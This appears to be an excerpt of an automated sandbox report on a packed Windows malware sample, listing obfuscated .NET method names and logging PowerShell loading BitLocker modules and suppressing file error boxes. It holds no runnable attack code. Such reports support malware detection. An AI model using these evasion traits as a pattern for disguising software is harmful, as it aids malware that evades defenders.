Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, hnb1mywmKd17dlbrAS.cs High entropy of concatenated method names: 'Dispose', 'mR89ae4IBQ', 'SJdk0qMKGV', 'puBVVvKaKN', 'tps9oyNhKU', 'PRD9z8IgcF', 'ProcessDialogKey', 'E2dk8n82kY', 't9gk9jtrH3', 'mBmkkAPsqe'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, LVNaJWsMIVA7LTLASE.cs High entropy of concatenated method names: 'zu7RHG1UCo', 'vEbR0GP5w9', 'Eo1RnLElCC', 'zSyRb4C8gr', 'L0DRqt1jRb', 'TXZRg6Ppie', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, D33N8oUtGVx7cDxPuT.cs High entropy of concatenated method names: 'Lp7JThJpMH', 'q8ZJr8Jvgu', 'xaoJqZNHsW', 'CwFJX9qL4U', 'BgjJ0sJB97', 'HlbJnZxrmw', 'UUJJbpHxl3', 'TmgJgfpCvS', 'OX8Jiv5yws', 'f4pJfSeAAh'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, zQyvpDqyxKTxd6tm0NN.cs High entropy of concatenated method names: 'GR7x4eMqyc', 'Kq8xPbdu6R', 'J7BxlIIphe', 'GQ7xpT3Nxd', 'LmaxwG8D2Y', 'R9hxDqi7L0', 'Ax6xMaB0Zt', 'NxYxs9KyRH', 'MlHx3p2K2W', 'VG5xmLUKfn'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, ksWtZCxKsl0TxRCTo8.cs High entropy of concatenated method names: 'GMr1LFkylo', 'hBS1ywuum5', 'ro41O5nLLW', 'VWvOoTrbwJ', 'x5aOzGVTLw', 'IAf18nrD6A', 'n5n19G5FS1', 'fBl1kLDsu7', 'j8A1QDxhFt', 'QhN1d7YRXe'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, pLwTg0qqY9GrvEoZXIs.cs High entropy of concatenated method names: 'ToString', 'a145Q4j8pu', 'KEt5dvERQh', 'DdN5I8eM0e', 'f0E5LRPIbe', 'wT056EPSsu', 'gSU5yxunrt', 'Gsw5EYZYIa', 'f7knYFscmhRWVWPDeQu', 'mTw6y3s22lokcZlLY0g'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs High entropy of concatenated method names: 'MToQIXKWBI', 'I3SQLs48n8', 'uf5Q6q4VEy', 'KWqQy0BBF1', 'UBEQEkuB7E', 'mIqQOFIKAA', 'wXWQ1wxG4a', 'sO5QKUDr8X', 'UTHQ7jmngF', 'T7eQFOJ0LT'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, lDlgAUP9SyyXYURNLR.cs High entropy of concatenated method names: 'EJi4pnojSnyAHRWqhYg', 'ErevP5orqMYelnaL321', 'kFEORtVAdX', 'Ku5Ox8stk6', 'OVRO5Ji6lb', 'CxNx8bo8umiUIrPhE6k', 'lIrvcSoddavqGvXHa7M'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, sC7nprRRvT8OJFZjOZ.cs High entropy of concatenated method names: 'rIk91RDsii', 'EuM9KyEpgg', 'KVG9F5wdH3', 'bJN9UWuJYc', 'ATy9J00PbH', 'l2k9e5iRIA', 'vgjpq3mDGeNj5ln0ix', 'wBXtHAIWQFkdYio0Cv', 'BC899EETi8', 'CUS9QYaSid'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, fSdvMKZMagrtwMm7Ri.cs High entropy of concatenated method names: 'lq2yprocYj', 'nEuyDyGS7y', 'IYryswC2ld', 'nvAy3Hoa8O', 'hRjyJPOISS', 'jDsyeSX940', 'o7iyCsHSMo', 'DnVyR9lYX6', 'DTQyx7NjxD', 'mKPy5h79Hy'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, O9PymkJ3NMlC2399qj.cs High entropy of concatenated method names: 'JKQhsEQCnj', 'o1Ah3VGbtY', 'GAThHYAQtH', 'Enah09bSsm', 'XX6hbdHFie', 'lgehgYG4SG', 'TZAhf0svRZ', 'TJEhckoEtg', 'RcthTZ3osW', 'FO5hjXiRBb'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, pBjySHqM5QnwRNWaSBd.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q9V5qOaeUr', 'h9u5XNVCx7', 'ufn5G8oA96', 'hl95AuUrbM', 'hsu5SjNYox', 'xFD5N7vpyl', 'Skh5Ydgfbf'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, xGB0Wf6bc0bOdc8jTI.cs High entropy of concatenated method names: 'kTtEwQ9SoG', 'kClEM2Olvv', 'OTJynuxQtD', 'jUNybontt7', 'lvTyg7lONl', 'Up9yi4TYcW', 'myLyfre4Cc', 'fSgycK60ak', 'kBRyWA5x19', 'hseyTKO9Er'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, KdpVO0auC752URy1LH.cs High entropy of concatenated method names: 'ToString', 'Po7ejc2CtV', 'Li3e0yrEQ1', 'gqcenHUq3F', 'cTYebFVO9p', 'n2CegR7eyF', 'kTfeiJlr7P', 'jBIefowaER', 'jS7ecR3arw', 'iuMeWWiTPi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, AnptoFjC7pNu1LqbY6.cs High entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, qyT5B9fG4eENyHVdsw.cs High entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, ojeKecA3ycAgUvCgAn.cs High entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, kIOpWCowqWShKUKAee.cs High entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, KSQ07YHqchvMXla9N1.cs High entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, Uel8r1lQF2PkteGZrv.cs High entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d4f16c.3.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d966c4.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d45b54.2.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
